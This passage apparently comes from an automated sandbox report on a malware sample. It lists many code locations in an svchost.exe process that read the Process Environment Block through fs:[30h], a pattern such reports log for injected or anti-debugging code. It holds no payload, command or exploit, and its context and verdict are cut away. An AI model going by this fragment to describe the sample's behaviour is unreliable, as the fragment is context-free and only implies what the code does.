            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0332A250 mov eax, dword ptr fs:[00000030h] 2_2_0332A250
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_03336259 mov eax, dword ptr fs:[00000030h] 2_2_03336259
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033EA250 mov eax, dword ptr fs:[00000030h] 2_2_033EA250
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033EA250 mov eax, dword ptr fs:[00000030h] 2_2_033EA250
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B8243 mov eax, dword ptr fs:[00000030h] 2_2_033B8243
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B8243 mov ecx, dword ptr fs:[00000030h] 2_2_033B8243
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033402A0 mov eax, dword ptr fs:[00000030h] 2_2_033402A0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033402A0 mov eax, dword ptr fs:[00000030h] 2_2_033402A0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h] 2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h] 2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h] 2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h] 2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h] 2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h] 2_2_0336E284
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h] 2_2_0336E284
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h] 2_2_033B0283
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h] 2_2_033B0283
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h] 2_2_033B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]2_2_033402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]2_2_033402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]2_2_033402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360124 mov eax, dword ptr fs:[00000030h]2_2_03360124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov ecx, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F0115 mov eax, dword ptr fs:[00000030h]2_2_033F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C156 mov eax, dword ptr fs:[00000030h]2_2_0332C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C8158 mov eax, dword ptr fs:[00000030h]2_2_033C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336154 mov eax, dword ptr fs:[00000030h]2_2_03336154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336154 mov eax, dword ptr fs:[00000030h]2_2_03336154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov ecx, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034061E5 mov eax, dword ptr fs:[00000030h]2_2_034061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03370185 mov eax, dword ptr fs:[00000030h]2_2_03370185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]2_2_033EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]2_2_033EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h]2_2_033D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h]2_2_033D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033601F8 mov eax, dword ptr fs:[00000030h]2_2_033601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]2_2_033F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]2_2_033F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6030 mov eax, dword ptr fs:[00000030h]2_2_033C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A020 mov eax, dword ptr fs:[00000030h]2_2_0332A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C020 mov eax, dword ptr fs:[00000030h]2_2_0332C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4000 mov ecx, dword ptr fs:[00000030h]2_2_033B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335C073 mov eax, dword ptr fs:[00000030h]2_2_0335C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332050 mov eax, dword ptr fs:[00000030h]2_2_03332050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6050 mov eax, dword ptr fs:[00000030h]2_2_033B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F60B8 mov eax, dword ptr fs:[00000030h]2_2_033F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F60B8 mov ecx, dword ptr fs:[00000030h]2_2_033F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C80A8 mov eax, dword ptr fs:[00000030h]2_2_033C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333208A mov eax, dword ptr fs:[00000030h]2_2_0333208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C0F0 mov eax, dword ptr fs:[00000030h]2_2_0332C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033720F0 mov ecx, dword ptr fs:[00000030h]2_2_033720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0332A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033380E9 mov eax, dword ptr fs:[00000030h]2_2_033380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B60E0 mov eax, dword ptr fs:[00000030h]2_2_033B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B20DE mov eax, dword ptr fs:[00000030h]2_2_033B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov ecx, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AC730 mov eax, dword ptr fs:[00000030h]2_2_033AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]2_2_0336C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]2_2_0336C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330710 mov eax, dword ptr fs:[00000030h]2_2_03330710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360710 mov eax, dword ptr fs:[00000030h]2_2_03360710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C700 mov eax, dword ptr fs:[00000030h]2_2_0336C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338770 mov eax, dword ptr fs:[00000030h]2_2_03338770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330750 mov eax, dword ptr fs:[00000030h]2_2_03330750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE75D mov eax, dword ptr fs:[00000030h]2_2_033BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]2_2_03372750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]2_2_03372750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4755 mov eax, dword ptr fs:[00000030h]2_2_033B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov esi, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033307AF mov eax, dword ptr fs:[00000030h]2_2_033307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E47A0 mov eax, dword ptr fs:[00000030h]2_2_033E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D678E mov eax, dword ptr fs:[00000030h]2_2_033D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]2_2_033347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]2_2_033347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE7E1 mov eax, dword ptr fs:[00000030h]2_2_033BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333C7C0 mov eax, dword ptr fs:[00000030h]2_2_0333C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B07C3 mov eax, dword ptr fs:[00000030h]2_2_033B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E627 mov eax, dword ptr fs:[00000030h]2_2_0334E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03366620 mov eax, dword ptr fs:[00000030h]2_2_03366620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368620 mov eax, dword ptr fs:[00000030h]2_2_03368620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333262C mov eax, dword ptr fs:[00000030h]2_2_0333262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372619 mov eax, dword ptr fs:[00000030h]2_2_03372619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE609 mov eax, dword ptr fs:[00000030h]2_2_033AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03362674 mov eax, dword ptr fs:[00000030h]2_2_03362674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]2_2_033F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]2_2_033F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]2_2_0336A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]2_2_0336A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334C640 mov eax, dword ptr fs:[00000030h]2_2_0334C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033666B0 mov eax, dword ptr fs:[00000030h]2_2_033666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C6A6 mov eax, dword ptr fs:[00000030h]2_2_0336C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]2_2_03334690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]2_2_03334690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]2_2_033B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]2_2_033B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0336A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A6C7 mov eax, dword ptr fs:[00000030h]2_2_0336A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6500 mov eax, dword ptr fs:[00000030h]2_2_033C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338550 mov eax, dword ptr fs:[00000030h]2_2_03338550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338550 mov eax, dword ptr fs:[00000030h]2_2_03338550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033545B1 mov eax, dword ptr fs:[00000030h]2_2_033545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033545B1 mov eax, dword ptr fs:[00000030h]2_2_033545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E59C mov eax, dword ptr fs:[00000030h]2_2_0336E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332582 mov eax, dword ptr fs:[00000030h]2_2_03332582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332582 mov ecx, dword ptr fs:[00000030h]2_2_03332582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03364588 mov eax, dword ptr fs:[00000030h]2_2_03364588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033325E0 mov eax, dword ptr fs:[00000030h]2_2_033325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C5ED mov eax, dword ptr fs:[00000030h]2_2_0336C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C5ED mov eax, dword ptr fs:[00000030h]2_2_0336C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033365D0 mov eax, dword ptr fs:[00000030h]2_2_033365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A5D0 mov eax, dword ptr fs:[00000030h]2_2_0336A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A5D0 mov eax, dword ptr fs:[00000030h]2_2_0336A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E5CF mov eax, dword ptr fs:[00000030h]2_2_0336E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E5CF mov eax, dword ptr fs:[00000030h]2_2_0336E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A430 mov eax, dword ptr fs:[00000030h]2_2_0336A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
